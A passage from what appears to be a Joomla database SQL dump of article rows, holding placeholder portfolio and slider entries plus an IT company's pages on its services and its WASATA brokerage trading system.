00:00:00','{\"image_intro\":\"images\\/portfolio\\/img1.jpg\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,7,'','',1,6,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(102,214,'United','fluid-layout','<p>United</p>','',1,82,'2013-12-18 09:31:34',736,'','2015-03-15 07:49:26',736,0,'0000-00-00 00:00:00','2013-12-18 09:31:34','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/United.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/United.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,1,'','',1,682,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(103,215,'Portfolio Page 2','portfolio-page-2','<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged</p>','',-2,14,'2013-12-18 08:52:43',736,'','2014-03-31 05:59:27',462,0,'0000-00-00 00:00:00','2013-12-18 08:52:43','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,0,'','',1,23,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(104,216,'Parallax Slider','parallax-slider','<p>loremipsum</p>','',1,79,'2013-12-19 05:47:01',736,'','2013-12-19 05:48:00',462,0,'0000-00-00 00:00:00','2013-12-19 05:47:01','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,5,'','',1,16,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(105,217,'Xpert Slider','xpert-slider','<p>lorem</p>','',1,79,'2013-12-19 05:47:31',736,'','2013-12-19 05:47:54',462,0,'0000-00-00 00:00:00','2013-12-19 05:47:31','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',2,3,'','',1,17,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(106,219,'Packed with all Cutting Edge Features','packed-with-all-cutting-edge-features','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',1,83,'2013-12-10 06:36:38',736,'','2014-02-07 08:37:01',462,736,'2015-03-12 12:37:51','2013-12-10 06:36:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/pages\\/pslider\\/img1.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',5,3,'','',1,46,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(107,220,'Ready to Launch Business and App Site','ready-to-launch-business-and-app-site','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',1,83,'2013-12-10 06:36:38',736,'','2014-01-15 06:52:53',462,0,'0000-00-00 00:00:00','2013-12-10 06:36:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/pages\\/pslider\\/img3.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',4,4,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(108,221,'Built with Expose and TwitterBootstrap','built-with-expose-and-twitterbootstrap','<p>\r\nLorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It has survived not only five centuries, but also the leap into electronic typesetting, remaining essentially unchanged. It was popularised in the 1960s with the release of Letraset sheets containing Lorem Ipsum passages, and more recently with desktop publishing software like Aldus PageMaker including versions of Lorem Ipsum.\r\n</p>','',1,83,'2013-12-10 06:36:38',736,'','2014-02-07 08:36:39',462,0,'0000-00-00 00:00:00','2013-12-10 06:36:38','0000-00-00 00:00:00','{\"image_intro\":\"images\\/pages\\/pslider\\/img2.png\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,2,'','',1,1,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(109,222,'Testimonial','testimonial','lorem','',1,79,'2013-12-20 04:38:57',736,'','0000-00-00 00:00:00',0,736,'2015-06-08 02:30:19','2013-12-20 04:38:57','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,1,'','',1,217,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(110,223,'Coming Soon Page','coming-soon-page','<p>lorem ipsum</p>','',-2,79,'2013-12-23 06:17:48',736,'','0000-00-00 00:00:00',0,0,'0000-00-00 00:00:00','2013-12-23 06:17:48','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,26,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(111,227,'DFM','business-pages','<p>DFM</p>','',1,84,'2014-03-31 06:04:29',736,'','2015-03-15 07:52:21',736,736,'2015-06-08 02:30:18','2014-03-31 06:04:29','0000-00-00 00:00:00','{\"image_intro\":\"images\\/portfolio\\/DFM.PNG\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"images\\/portfolio\\/DFM.PNG\",\"float_fulltext\":\"none\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',6,12,'','',1,709,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(112,246,'Partners','partners','<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img4.jpg\" alt=\"\" />\r\n<h3>Wayne Rooney</h3>\r\n<h4>CTO</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img5.jpg\" alt=\"\" />\r\n<h3>Zlatan Ibrahimović</h3>\r\n<h4>Front End Engineer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">a\r\n<div class=\"block\"><img src=\"images/pages/team/img6.jpg\" alt=\"\" />\r\n<h3>Edinson Cavani</h3>\r\n<h4>Graphic Designer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>\r\n<div class=\"width-25\">\r\n<div class=\"block\"><img src=\"images/pages/team/img7.jpg\" alt=\"\" />\r\n<h3>Radamel Falcao</h3>\r\n<h4>Intern. Developer</h4>\r\n<div class=\"social-links\"> </div>\r\n</div>\r\n</div>','',-2,14,'2015-03-12 10:17:39',736,'','0000-00-00 00:00:00',0,736,'2015-03-12 10:23:59','2015-03-12 10:17:39','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',1,0,'','',1,5,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(113,249,'part','part','','',1,14,'2015-03-12 10:56:05',736,'','2015-07-08 06:57:00',736,736,'2015-07-08 06:57:00','2015-03-12 10:56:05','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_vote\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"0\",\"show_article_options\":\"0\",\"show_urls_images_backend\":\"0\",\"show_urls_images_frontend\":\"0\"}',5,15,'','',1,1845,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(114,250,'Client','client','','',1,14,'2015-03-15 05:22:50',736,'','2015-07-08 06:58:16',736,0,'0000-00-00 00:00:00','2015-03-15 05:22:50','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"0\",\"link_titles\":\"0\",\"show_intro\":\"0\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_vote\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"0\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"0\",\"show_article_options\":\"0\",\"show_urls_images_backend\":\"0\",\"show_urls_images_frontend\":\"0\"}',5,14,'','',1,1820,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(115,251,'Services','services','<p>Our professional service staff helps customers to implement their projects in a highly efficient and effective way to ensure that our cost effective solution meets their business and technological requirements and goals. FIT professional services include:</p>\r\n<ul>\r\n<li>IT Strategies & Plans</li>\r\n<li>Operations Policies & Procedures</li>\r\n<li>Business Requirement Definition</li>\r\n<li>Solution Architecture Design </li>\r\n<li>Application Development </li>\r\n<li>System Integration</li>\r\n<li>Installation & deployment</li>\r\n<li>Testing & QA</li>\r\n<li>Training</li>\r\n<li>Technical Support</li>\r\n<li>Maintenance</li>\r\n</ul>\r\n<p> </p>\r\n<p>In addition, FIT provides its customers with expertise in the following sectors:</p>\r\n<ul>\r\n<li>Consultancy – Supporting its customers in the design phase, keeping in consideration every aspect of the system: technical, functional, and architectural;</li>\r\n<li>Design and Development – Through its specialized workgroups, the company can develop any type of complete solution, built on the assets of knowledge and experiences;</li>\r\n<li>Systems Support and Maintenance – Delivered to the customers for any type of requirement relevant to software, application management and data-stream. </li>\r\n</ul>','',1,14,'2015-03-15 05:38:00',736,'','2015-06-30 02:47:50',736,736,'2015-07-02 00:56:40','2015-03-15 05:38:00','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',11,13,'','',1,2805,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(116,257,'Products : Investment Soltuions','products-investment-soltuions','<p><span style=\"text-decoration: underline;\"><strong><span lang=\"EN-GB\" style=\"font-family: \'Times New Roman\',\'serif\'; font-size: 12pt; mso-fareast-font-family: \'Times New Roman\'; mso-ansi-language: EN-GB; mso-fareast-language: EN-US; mso-bidi-language: AR-SA;\"><span style=\"color: #000000;\"><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 12pt; mso-fareast-font-family: \'Times New Roman\'; mso-ansi-language: EN-GB; mso-fareast-language: EN-US; mso-bidi-language: AR-SA; mso-bidi-font-family: \'Times New Roman\';\">Brokerage Management Solution (WASATA)</span></span></span></strong></span></p>\r\n<p> </p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify; mso-outline-level: 1;\"><b><i><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 14pt; mso-ansi-language: EN-GB; mso-bidi-font-family: Arial;\"><span style=\"color: #000000;\">WASATA</span></span></i></b><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 11pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\">is a complete trading system developed to provide a user friendly, fast and effective electronic trading system for Banks, Brokerage Companies and other stakeholders involved in capital markets. </span></span></p>\r\n<p> </p>\r\n<p style=\"margin: 0in 0in 0pt; text-align: justify; mso-outline-level: 1;\"><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 11pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\"> </span></span><b><i><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 14pt; mso-ansi-language: EN-GB; mso-bidi-font-family: Arial;\"><span style=\"color: #000000;\">WASATA</span></span></i></b><span lang=\"EN-GB\" style=\"font-family: \'Century Gothic\',\'sans-serif\'; font-size: 11pt; mso-ansi-language: EN-GB;\"><span style=\"color: #000000;\">is a set of modules developed to manage, in an integrated mode, the functionalities required for the administration of securities, asset management, order collections and distribution of financial products. </span></span></p>\r\n<p> </p>','',1,14,'2015-04-08 08:48:33',736,'','2015-04-09 07:18:39',736,736,'2015-06-30 02:47:31','2015-04-08 08:48:33','0000-00-00 00:00:00','{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}','{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}','{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}',3,12,'','',1,3,'{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}',0,'*',''),(117,258,'Why FIT?','why-fit','<p>FIT has grown gradually within the We believe that we have the experience, the motivation and the professional staff to offer a unique combination of proprietary Information Technology solutions, complete professional services, new ideas, efficient, effective products and services.</p>\r\n<p>Over the past five years, our solutions have executed more than 750 Billion AED in UAE markets only and expected more than 950B AED in the coming three years.</p>\r\n<p>FIT has grown gradually within the region , serving the Omani securities market (MSM) brokers in the country (approx. 95% Oman market share), in addition to some of the largest brokerage houses in their respective GCC countries: The solution has therefore has been proven in 4 GCC countries. The company has also performed work for the Muscat Securities Market, Dubai Financial Market, and Capital Markets Authorities.</p>','',1,14,'2015-03-15 